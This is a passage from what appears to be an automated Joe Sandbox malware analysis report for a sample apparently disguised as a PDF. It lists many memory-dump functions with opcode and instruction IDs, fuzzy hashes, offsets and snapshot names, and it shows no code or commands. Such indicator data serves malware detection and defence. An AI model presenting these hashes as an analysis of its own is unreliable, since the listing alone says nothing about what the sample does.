                                                                                      • Opcode Fuzzy Hash: 6dde2d653975f0810405191cecfd8e243160d749b7b2f427c15d638ea76b54ec
                                                                                      • Instruction Fuzzy Hash: 78F09078809288AFCB51CF98D841AFDBFB9AF4A210F14809AFC5483351C2359A52DFA0
                                                                                      Function 06767B60 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a430f5da91a1505b9175fb399199c0f3429fd9d1e75c58e244cb0e63c9e9dcc
                                                                                      • Instruction ID: 8cfcd7c325379785ec83c94eec4dc6c680e2ff4edee5079540f4d437c9198604
                                                                                      • Opcode Fuzzy Hash: 1a430f5da91a1505b9175fb399199c0f3429fd9d1e75c58e244cb0e63c9e9dcc
                                                                                      • Instruction Fuzzy Hash: 90F0A020B0914C9FCB58AAA5A85523CBB54D747369F1406EAEC0DC7781ED239D108391
                                                                                      Function 06501838 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ef0cdb07703729cd2a0e24100724567a7a662a6fd4007575a7f78e4087b9df6
                                                                                      • Instruction ID: 2c691107905fb9e70b06d7edc94685579041cf547b1b1afec78bc2172265b78b
                                                                                      • Opcode Fuzzy Hash: 6ef0cdb07703729cd2a0e24100724567a7a662a6fd4007575a7f78e4087b9df6
                                                                                      • Instruction Fuzzy Hash: B6F0A77480A244BFD714DB94DD109BA7F78EB85710F1481DAE84457282C5319E46D7B1
                                                                                      Function 065C3610 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9b2bc48675d5f4bab1967296555d49583c2cb615877e0425880a44197710a439
                                                                                      • Instruction ID: da0c1927c3ae3d28d854d4a5ef52a8dc998e096df31e0a81ce725fb47a249a7b
                                                                                      • Opcode Fuzzy Hash: 9b2bc48675d5f4bab1967296555d49583c2cb615877e0425880a44197710a439
                                                                                      • Instruction Fuzzy Hash: 6BF03A39905208FFCB50CFA5DC019EDBFB4EB99320F00C09AE81897311D632AA96DF91
                                                                                      Function 065C8A50 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51c4f7b1d8a0b1eb72e58987da590f1478e84d8a523dc1337e37534dc56b8cb6
                                                                                      • Instruction ID: 3ea37680a22043bd62f85467fca1ab0ee56cf43807c265cdfac78ca8c57308af
                                                                                      • Opcode Fuzzy Hash: 51c4f7b1d8a0b1eb72e58987da590f1478e84d8a523dc1337e37534dc56b8cb6
                                                                                      • Instruction Fuzzy Hash: 2CF0A77450A258BFC705CB94DD01DFA7F79AB46221F0081DAE84497292D6315E42DBF1
                                                                                      Function 065CC058 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd0b5c86b0eb32663b1988a04066127e0e797b8842a953451bce2b594b44e3d6
                                                                                      • Instruction ID: 231c1f0948257e2c4ed12c69f12d41517fb5d8fb8f61d74623c24fc7eb0dce2c
                                                                                      • Opcode Fuzzy Hash: fd0b5c86b0eb32663b1988a04066127e0e797b8842a953451bce2b594b44e3d6
                                                                                      • Instruction Fuzzy Hash: 03F03AB090A208AFCB55CFB8C9059EDBFB5EB49310F04C1EEE809E3312D2355A51DB50
                                                                                      Function 065C1948 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c182bfdc114c9748c32a19d0d299b7b43a9c5b1de4fc4f56ca465e1677abe8c
                                                                                      • Instruction ID: e1749d66c0918e0f809a6b96d033f6142c1504511f866fbfe8aa40099c32f925
                                                                                      • Opcode Fuzzy Hash: 6c182bfdc114c9748c32a19d0d299b7b43a9c5b1de4fc4f56ca465e1677abe8c
                                                                                      • Instruction Fuzzy Hash: E7F05E74D09248AFC795DBA9D8156ADBFF4EB8A200F04C1DAE848D3352D6355E42CBA1
                                                                                      Function 06764C78 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2cfaed1ccc53f9d03dd50443be1c0291b8209983c590d36d3fd6a4fa7765cb2d
                                                                                      • Instruction ID: fdce40a9e8058aa9dfbdfaf2daf89f76dd2cbbf1d6a56ea8b1a21a521a9aa0fe
                                                                                      • Opcode Fuzzy Hash: 2cfaed1ccc53f9d03dd50443be1c0291b8209983c590d36d3fd6a4fa7765cb2d
                                                                                      • Instruction Fuzzy Hash: F2F05E353002009FC304DF19D858D2AB7AAEFCD721B11806AFA068B3B0CB31EC02DB90
                                                                                      Function 06500437 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb4c9c420ab05c299e013eecf0142feefedc12952ce8a3a8e6a52dbb767c262f
                                                                                      • Instruction ID: 832d5f5a632da20dd50e8638fa314d45465e86b29dc4a2ea94daccbc5af38a7f
                                                                                      • Opcode Fuzzy Hash: bb4c9c420ab05c299e013eecf0142feefedc12952ce8a3a8e6a52dbb767c262f
                                                                                      • Instruction Fuzzy Hash: 53F01730D09208EFD740DBA8D9406ACFBF8EF49204F10C1EAD84897282D631A956CF91
                                                                                      Function 065C2349 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e822dfa502703977866a107a62d7a3a69b6f53313e39bf385dbb42a78209ac8
                                                                                      • Instruction ID: 6802a51ef1026602f606c58815d143f7d03e5eb8b8aaa3f0e176eddd89780942
                                                                                      • Opcode Fuzzy Hash: 2e822dfa502703977866a107a62d7a3a69b6f53313e39bf385dbb42a78209ac8
                                                                                      • Instruction Fuzzy Hash: 2AF03A74D09248EFCB50CFA8D944AA9BBB4AB49210F0080AAA808E3351C6319A51DB91
                                                                                      Function 066A66D1 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b957fa5d0750795c0cce1caba201588d4a68e3ae1e6268a74df7a68600b80c18
                                                                                      • Instruction ID: 7f97ab5c707f6d65eedf2f52da7d7610f3177a3ac8a84ea1b9ee3f60fcea7b42
                                                                                      • Opcode Fuzzy Hash: b957fa5d0750795c0cce1caba201588d4a68e3ae1e6268a74df7a68600b80c18
                                                                                      • Instruction Fuzzy Hash: D3F05E34D05208EFCB94DFA8D855AADBBF5EB88300F04C0AAAC1897351D6329E61DF91
                                                                                      Function 066AACE7 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8abbc33bf703f422273ec10b1f9367d88241b0f030be7f95fffb5f521118372
                                                                                      • Instruction ID: 63205082e0c4510357ef932397e071dddc11b6898013f2873294a26622b0ecb0
                                                                                      • Opcode Fuzzy Hash: c8abbc33bf703f422273ec10b1f9367d88241b0f030be7f95fffb5f521118372
                                                                                      • Instruction Fuzzy Hash: FEE09235606208BFDB01DBA4FD41AEE7BB9EB86314F2041E6F408E7242D9311F4697B1
                                                                                      Function 065CEE12 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 181e727ea306d666025c1b5b2a827cf921dde7941993bd6876477b76079306e1
                                                                                      • Instruction ID: 4187ea0f3437dc694c95faaa2f7464daab0ae722c1b9fac0e9d4599f103cc8f5
                                                                                      • Opcode Fuzzy Hash: 181e727ea306d666025c1b5b2a827cf921dde7941993bd6876477b76079306e1
                                                                                      • Instruction Fuzzy Hash: CBF08C72A052199FDB149BA8C9256AE7BF2AB88710F10082ED406F7781CB78AC058B90
                                                                                      Function 0676C808 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e6792424a77c2aef7f4d76ae2376ddd8bd08b69fd1ba29e2c7b72cb231999bbb
                                                                                      • Instruction ID: e1dfc1a51c2248647d023b2df00671611ebcb05bb1d9c9aff8a31158534842b2
                                                                                      • Opcode Fuzzy Hash: e6792424a77c2aef7f4d76ae2376ddd8bd08b69fd1ba29e2c7b72cb231999bbb
                                                                                      • Instruction Fuzzy Hash: 43F08230C09249AFC766CBA5D8145B9BFB4DF86200F14C0EAEC4497362C6359A46DB91
                                                                                      Function 066A77F0 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78c7eeadbc6fc0a5c441639b2c70ac2c26e725eea4d4eeaa7652a682538b81e7
                                                                                      • Instruction ID: 02e65e6a371964644f7a6059bcaf9c02d54bf15c9d975d26d18fbc68350c3289
                                                                                      • Opcode Fuzzy Hash: 78c7eeadbc6fc0a5c441639b2c70ac2c26e725eea4d4eeaa7652a682538b81e7
                                                                                      • Instruction Fuzzy Hash: F3F0E578819308FFC710CF50DD11DAABF74EB45300F1184ADE88057352C6315EA2CBA6
                                                                                      Function 066A9828 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f53f7a84680ce422f955e3ed6cb0d760afee9873ca4c04fb4780a70d3000f03
                                                                                      • Instruction ID: 5ea00a6f84688a8c51b4bb6319ad8d3903fd4451210989eae1ab873f38b97656
                                                                                      • Opcode Fuzzy Hash: 2f53f7a84680ce422f955e3ed6cb0d760afee9873ca4c04fb4780a70d3000f03
                                                                                      • Instruction Fuzzy Hash: E8F05E34D09248AFCB80DFA8D5505ACBBB0EB89300F10C1DADC0897352D2314E16CB91
                                                                                      Function 066A60A9 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41493d48855f044825b63074085828a539fdfc43b6d80fc728febebcff0fc8f4
                                                                                      • Instruction ID: a606b39a4094f0b098d589abde3774711f1c218362b04a975225f0a0bce3eaa7
                                                                                      • Opcode Fuzzy Hash: 41493d48855f044825b63074085828a539fdfc43b6d80fc728febebcff0fc8f4
                                                                                      • Instruction Fuzzy Hash: 38F0FE70E0A348EFCB45DFA8D554598BFF0EB49204F1481DAD808D7352C2369A46CB51
                                                                                      Function 065C2D90 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 800d08e9cd9bcdb56a1ff78a38d70e3666143ddd07e3c581bee6e1cfc6985f5f
                                                                                      • Instruction ID: 4fe9ff33fc1259276fbad7d9369d704ab60e1533d7c9b258fc131f5601bfccb8
                                                                                      • Opcode Fuzzy Hash: 800d08e9cd9bcdb56a1ff78a38d70e3666143ddd07e3c581bee6e1cfc6985f5f
                                                                                      • Instruction Fuzzy Hash: E5F0A03480A308EFC715CBA4D9519A9BFB4AF46310F14C0DEEC4457253C6729E53DBA1
                                                                                      Function 065C72E1 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce87a1a6083a519fce63a0762f46b5342419a45517d9bb299486f7b80879c526
                                                                                      • Instruction ID: 84bc15b9badfbad401f596dc042a85884bd2e533f87406d45c9ff71d142e7b66
                                                                                      • Opcode Fuzzy Hash: ce87a1a6083a519fce63a0762f46b5342419a45517d9bb299486f7b80879c526
                                                                                      • Instruction Fuzzy Hash: 53015FB4A10218DFDB50CF68D984B9DB7B2FB49314F1082A9E909E7245D7749E84CF51
                                                                                      Function 065C3BB0 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40c73fe149455c16edb2dcb9c8745d194792d3324e1317b74102a67fd162f698
                                                                                      • Instruction ID: e9030e2a429af0168d2a0d2cabd930d9c3ecec82522e2f8ed35e353665869e8e
                                                                                      • Opcode Fuzzy Hash: 40c73fe149455c16edb2dcb9c8745d194792d3324e1317b74102a67fd162f698
                                                                                      • Instruction Fuzzy Hash: 8DF0823490924CEFC715DBA8D9419A8BFB4AF46204F14C1DED84457343C63A5A46CBA5
                                                                                      Function 0676CE70 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b9a49a2dde3cc77c71e264c555f3d031ffca35d241c2fa7810b21f5c784fee2
                                                                                      • Instruction ID: f05bed1cb4fa28aaf338dc2fb1b41799e91a12d89158a48ff81d6186bcd0ac71
                                                                                      • Opcode Fuzzy Hash: 0b9a49a2dde3cc77c71e264c555f3d031ffca35d241c2fa7810b21f5c784fee2
                                                                                      • Instruction Fuzzy Hash: E6E09B3550A244AFC366C755D9129B57B7C5B57200F1481D5FC44D7262C5315D02C361
                                                                                      Function 0650720A Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b41fb3146c63bec08da9771f3f49859dcb55d30c6d0fb53b6a3799199ceebc0
                                                                                      • Instruction ID: cab1ec3808beff726ff9cce3017553cce87fc83e2cb7c07a09407898f7e25ed0
                                                                                      • Opcode Fuzzy Hash: 5b41fb3146c63bec08da9771f3f49859dcb55d30c6d0fb53b6a3799199ceebc0
                                                                                      • Instruction Fuzzy Hash: 98F05E30809288AFC751CBA4D9046A9FFB4AB4A210F14C1DAE88857292D635AA55DBA1
                                                                                      Function 066A64C0 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c524482391184fa67f02d78857b2e4966072afb0a5ec72ccbd3e9f5f72bae5a
                                                                                      • Instruction ID: 37cecee02a043153b47e0e0382bad9e166d525a70751c98b4c1263dddefdefd4
                                                                                      • Opcode Fuzzy Hash: 4c524482391184fa67f02d78857b2e4966072afb0a5ec72ccbd3e9f5f72bae5a
                                                                                      • Instruction Fuzzy Hash: 16E06DB1406248AFC722EBB5C901B9E7BF8DB46200F0140D6A10097252ED214A04DBB2
                                                                                      Function 066A71A2 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e3d8b331e9c1f62246a7003531066a693e6bc8532bab2baeaf8677369bdd070
                                                                                      • Instruction ID: 88382339bec565c8280bfdc88792f2fc10498d9174776bdd52f9062e35f14d19
                                                                                      • Opcode Fuzzy Hash: 9e3d8b331e9c1f62246a7003531066a693e6bc8532bab2baeaf8677369bdd070
                                                                                      • Instruction Fuzzy Hash: 78F03078D05208EFC794DFA8D945AAEBFF4EB48311F10C1A9AC0893301D631AE52DF90
                                                                                      Function 0676DE51 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acef8fa91dfc7151ac96475b3deca3f4e554df15c0f8926bbe4c76051a1248bb
                                                                                      • Instruction ID: 28942231b896541a761c0d3c3b2cbf9c7287e7af7318863e0bb8eccb26b1808e
                                                                                      • Opcode Fuzzy Hash: acef8fa91dfc7151ac96475b3deca3f4e554df15c0f8926bbe4c76051a1248bb
                                                                                      • Instruction Fuzzy Hash: DBE0D8B0A09244AFC3BAC795D800975BF79DF67310B0540C9EC048B362D6329D42C361
                                                                                      Function 067606D0 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59be6da9ed9fb62f46479ccf385ec3757e81cc4af2af226eab797a9cfd4d850a
                                                                                      • Instruction ID: 3644e034e500c52cc4df15dfdbb12a9e63cf6f7d824debdead4496965e979004
                                                                                      • Opcode Fuzzy Hash: 59be6da9ed9fb62f46479ccf385ec3757e81cc4af2af226eab797a9cfd4d850a
                                                                                      • Instruction Fuzzy Hash: 19E022307093824FCB52CB3AE8209627FA6AFC130030881AAF444CF252FA20DD8683A1
                                                                                      Function 06504A80 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7244a0bb15643ca05846aaadec8c3a1d14b14f16def2f3797bee7281f631518a
                                                                                      • Instruction ID: 9aca609d3d9b395012fcdc3121ebc1cc5fec15e9b47c0ac1964a1c9eafcbd5fa
                                                                                      • Opcode Fuzzy Hash: 7244a0bb15643ca05846aaadec8c3a1d14b14f16def2f3797bee7281f631518a
                                                                                      • Instruction Fuzzy Hash: A2F0F874D04248EFCB90DFA9C940AADBBF9AB48310F14C0AAA968D3341D6359A51DF50
                                                                                      Function 066AAD31 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e6843d03ec4b9770c1c41a2ca30b60067186b0cf5655d20648444620ee68e45d
                                                                                      • Instruction ID: c61cfe6d66de7bd3f7fa10949c8f908222857379fa3f5037a171cb8716cfdfa9
                                                                                      • Opcode Fuzzy Hash: e6843d03ec4b9770c1c41a2ca30b60067186b0cf5655d20648444620ee68e45d
                                                                                      • Instruction Fuzzy Hash: 82E0223460A388AFDB00CB74EE517AE7FF6EB46204F1040DEE800DB142D9310F14A7A1
                                                                                      Function 065CEE18 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a3e4381dd2deefba875bdeb81e1bd0176d86cf4900257697b7e0cf0c361ecdd
                                                                                      • Instruction ID: a84a1f2aacd3ff1758735c176344d1c3414a04a7d63c1af49499f43ab1f615d0
                                                                                      • Opcode Fuzzy Hash: 2a3e4381dd2deefba875bdeb81e1bd0176d86cf4900257697b7e0cf0c361ecdd
                                                                                      • Instruction Fuzzy Hash: 20F0A071A043199BCB149BA8C82569EBBF6AB48710F00082DD402F7781CF74AC04CB90
                                                                                      Function 065C2490 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a3468346dd188b67989e3beef3078c225a0d720a7556002fde50d5351b63b4c
